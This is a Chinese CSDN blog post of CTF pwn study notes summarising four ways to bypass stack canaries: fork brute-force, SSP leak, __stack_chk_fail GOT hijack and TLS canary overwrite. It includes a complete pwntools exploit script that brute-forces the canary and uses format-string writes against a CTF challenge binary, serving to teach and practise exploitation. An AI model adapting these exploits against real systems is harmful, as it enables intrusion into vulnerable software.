【PWN学习】cannary绕过方式汇总

最新推荐文章于 2024-03-31 00:48:45 发布
最新推荐文章于 2024-03-31 00:48:45 发布
阅读量656 收藏 9
点赞数 4
文章标签: 学习 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41748164/article/details/135164482
版权

背景

利用cannary解题在现在的CTF比赛中似乎已经过时了,只是为了学习了解一下。

绕过的4种方式

目前我了解到的方式主要有以下4种

  1. fork
  2. ssp
  3. stack_chk_fail
  4. TLS canary attack

fork

每次进程重启后的Canary是不同的,但是同一个进程中的Canary都是一样的。并且 通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。
爆破次数:对于32位ELF,低字节固定是\x00,所以只需要对三个字节进行爆破。爆破方式是先利用栈溢出覆写次低字节,如果出错的话,会报错,获得正确的次低字节的话,不会报错。获取正确的次低字节之后,再依次爆破次高字节和高字节。
在这里插入图片描述
在这里插入图片描述function1
在这里插入图片描述

在这里插入图片描述
基本思路就是,程序通过fork出子进程,cannary不会变,程序崩溃后是不会退出,从低位到高位逐字节覆盖cannary即可,

ssp

如果程序已经将flag读取到了某一个位置上,通过修改env[0]为flag的位置上,利用stack_chk_fail会打印出env[0]来变相读出flag,但在高版本的glbic上已经过时
在这里插入图片描述

stack_chk_fail

在开启canary保护的程序中,如果canary不对,程序会转到stack_chk_fail函数执行。stack_chk_fail函数是一个普通的延迟绑定函数,可以通过修改GOT表劫持这个函数。
在这里插入图片描述
利用格式化字符串漏洞更改stack_chk_fail got表

TLS canary attack

Canary 储存在 TLS 中,在函数返回前会使用这个值进行对比。当溢出尺寸较大时或者任意地址写的时候,通过覆盖栈上储存的 Canary 和 TLS 储存的 Canary 实现绕过。
在这里插入图片描述
格式化字符串漏洞,第一次泄漏栈地址,第二次修改TLS结构,第三次覆盖cannary即可

exp

from pwn import *
from LibcSearcher import *
import sys
import time
import binascii
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
elf = ELF("./pwn")

#
if len(sys.argv) == 1:
	p = remote("node4.buuoj.cn","29647")
	#libc = ELF("./libc-2.27_64.so")
	#onegadget_array = [0x45216,0x4526a,0xf02a4,0xf1147]
	#p = remote("172.17.0.2","8888")
	#libc = ELF("./libc-2.27.so")
	#onegadget_array = [0x45216,0x4526a,0xf02a4,0xf1147]
	
else:
	p = process("./pwn")
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
"""
Gadgets information
============================================================



""" 
def debug(gs):
	if len(sys.argv) > 2:
		gdb.attach(p,gs)
		pause()
		#raw_input()
		
context.log_level="debug"


get_flag_address = 0x4008F7

def attack1():
	p.sendlineafter("Enter your choice: ","1")
	payload = b"a"*0x48
	cannary = b""
	for i in range(0,8):
		for j in range(0,0xff):
			temp =payload +  int.to_bytes(j,1,"little")
			p.sendafter("welcome\n",temp)
			result = p.recv(0x3)
			print(b"[*]"+result)
			if b"***" in result:
				j+=1
			else:
				payload+= int.to_bytes(j,1,"little")
				cannary = cannary+int.to_bytes(j,1,"little")
				break

	#print(u64(cannary))
	log.info("cannary is 0x%x"%u64(cannary))	
	payload = b"a"*72
	payload += p64(u64(cannary))+b"b"*8+p64(get_flag_address)

	debug(gs = "set follow-fork-mode child\n b *0x4009A7")
	pause()
	p.sendafter("welcome\n",payload)
def attack2():
	p.sendlineafter("Enter your choice: ","2")
	flag_address = 0x6020E0
	payload = b"a"*296+p64(flag_address)
	p.sendafter("do!\n",payload)

def attack3():
	__stack_chk_fail_got = elf.got["__stack_chk_fail"]
	p.sendlineafter("Enter your choice: ","3")
	get_flag_address = 0x4008F7
	
	debug(gs="b *0x400B1C\n b*0x400B2D")
	payload = b"a%4196598c%8$lln"+p64(__stack_chk_fail_got)
	# payload = b"a"*296+p64(flag_address)
	p.sendafter(b"Write something?\n",payload)
	payload = b"a"*0x50
	p.sendlineafter("Again?",payload)
def attack4():
	# 0x42ff80
	p.sendlineafter("Enter your choice: ","4")
	payload = "aaaa%9$p"
	
	p.sendafter("Write something?\n",payload)
	p.recvuntil("aaaa0x")
	cannary_stack_address = int(p.recv(12),16)+0x28
	
	if cannary_stack_address&0xff !=0x28:
		exit(0)

	
	payload = b"aa%43688c%10$lln"+p64(cannary_stack_address)
	
	
	p.sendafter("Write something?\n",payload)
	payload = b"a"*0x38+p64(0xaaaa)+b"b"*8+p64(get_flag_address)
	debug(gs="b *0x400BDE")
	p.sendafter("Again?",payload)

	log.info("cannary_stack_address:0x%x"%cannary_stack_address)
attack1()	
attack2()
attack3()
attack4()
p.interactive()
weixinzjh
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料参考自互联网 chunk 描述: 当用户通过malloc等函数申请空间时,实际上是从堆中分配内存 目前 Linux 标准发行版中使用的是 glibc 中的堆分配器:ptmalloc2 ptmalloc根据用户的需要,为用户分配不同类型的chunk 结构体: struct malloc_chunk { INTERNAL_SIZE_T p
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
Canary绕过方法
最新发布
zhuo1358的博客
03-31 767
Canary设计其低字节为\x00,本意是阻止被read、write等函数直接将Canary读出来。\x00二话不说,上题基础检查发现canary丢入ida中发现在循环printf,并且存在字符串漏洞(这个稍后再谈)同时有getshell函数可以直接拿shell接下来就是找canary到栈顶的偏移有两种方法,这里先介绍第一种看汇编语言跟进这段函数的汇编发现 多了一段异或比较可以判断canary在var_c里,所以buf 到canary的偏移为0x70-0xc。
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
pwn学习历程.pdf
09-30
pwn学习修炼之旅,内部包含各个模块各个知识点,有助于爱好者有方向的学习前进,加油,很好的资料哦,很有意义。
pwn学习】Canary的各种绕过姿势
Morphy_Amo的博客
12-24 5220
Canary各种绕过姿势
Pwn入门笔记(四)canary初识
qq_33590156的博客
11-26 1571
Leak Canary Canary1 wp 什么是canary呢,就是在程序进行输入前会生成一个随机数(每一次执行程序这个数都不一样),格式为“0x…00”,在ida中是这样的 画圈的地方就是生成了canary值赋给v4,最后一行将v4和之前的值取异或,之后return将这个值返回。 题目逻辑很简单,就是两次输入输出,很明显格式化字符串漏洞。然后还有个函数叫getshell,这就是我们要执行的system函数,思路就清晰了,先用格式化字符串漏洞打印canary的值,然后栈溢出获取shell。 那么在栈上他
PWN-canary学习
苗_的博客
02-10 1475
先简单介绍一下canary: Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中获取一个值,一般存到EBP - 0x4(32位)或RBP - 0x8...
pwn-canary绕过和PIE(未完待续)
m0_75234353的博客
05-30 888
看见了fork函数,那就通过爆破得出canary对于 Canary,但是同一个进程中的不同线程的 Canary 是相同的,并且通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。我们可以利用这样的特点,彻底逐个字节将 Canary 爆破出来。 打开sub_128A函数 明显的溢出发现后门函数 开始计算溢出大小0x70-0x80=104①先逐字爆破出canary的值②直接溢出到返回地址,覆盖为后门函数的地址。但这道题开了PIE保护,而PIE是代码段,数据段
Canary保护机制及绕过
二狗的博客
01-29 776
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记
PWN入门(10)绕过程序堆栈Canary防护
Ba1_Ma0的博客
10-05 1065
简介“pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入10文件夹。
ctf-pwn:canary绕过
chennbnbnb的博客
01-19 2925
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
Linux pwn入门教程(9)——stack canary绕过的思路
子曰小玖的博客
06-04 2540
https://bbs.ichunqiu.com/thread-44069-1-1.html 0x00 canary简介 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实现。canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金...
【八芒星计划】绕过canary
carol2358的博客
09-02 647
文章目录wdb2018_guess wdb2018_guess 有趣的题目,本题fork了三次,那么就会gets三次 利用三次gets和canary,我们可利用stack smash来获得三次信息 第一次获得libc,第二次获得栈地址,第三次获得flag 覆盖argv[0],也就是程序名所在的位置 先用puts的got来获得libcbase,用libcbase获得environ的地址,也就是stack_end,位置是utf8的位置 然后第二次输入通过environ来获得stack的地址 第三次就可以
i春秋2020新春战役PWN之BFnote (修改TLS结构来bypass canary)
seaaseesa的博客
02-24 2103
BFnote 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 一开始处,有一个栈溢出漏洞,但是由于开启了canary保护,得想办法绕过canary。下方的堆溢出,不仔细看还发现不了,v4只有一开始被初始化,在循环里,只有i被重新赋值,v4没变,而下方又用到了v4。 这题是可以绕过canary的,这就牵涉到了一个知识点。 在linux下,有一种线程局部存储(Thread ...
2021-06-15 pwn之canary绕过简单思路梳理
yulate的个人博客
07-13 743
文章目录一、原题链接二、简单解题思路0x01、查看程序保护0x02、main的栈0x03、构造payload0x04、最终exp 一、原题链接 bugku-pwn4 二、简单解题思路 0x01、查看程序保护 开启了canary保护和NX保护 0x02、main的栈 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[48]; // [rsp+10h] [rbp-240h] BYREF char v5
绕过canary原理及其利用方式
glhdbk的博客
09-07 4178
canary简介: canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_chk_fail函数,继而终止程序。 所以如果有一道题开启了canary...
学习pwn需要学习哪些数学知识
05-18
学习 pwn 通常需要掌握以下数学知识: 1. 二进制和十六进制:pwn 题目通常会给出二进制或十六进制的数据,因此需要熟悉这两种进制的转换和计算。 2. 离散数学:离散数学是计算机科学中的一门重要课程,它涉及到许多 pwn 中用到的算法和数据结构,例如哈希表、图论、组合数学等。 3. 模运算:在 pwn 中,模运算经常被用来处理加密算法或者防止整数溢出等问题。 4. 基础数论:pwn 题目中经常涉及到素数、欧拉函数、费马小定理等基础数论概念,因此需要对这些内容有一定的了解。 5. 线性代数:在 pwn 中,矩阵运算和向量运算经常被用来解决密码学和加密算法相关的问题,因此需要对线性代数有一定的了解。 当然,不同的 pwn 题目可能需要的数学知识也会有所不同,但以上几个方面是比较基础和常见的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值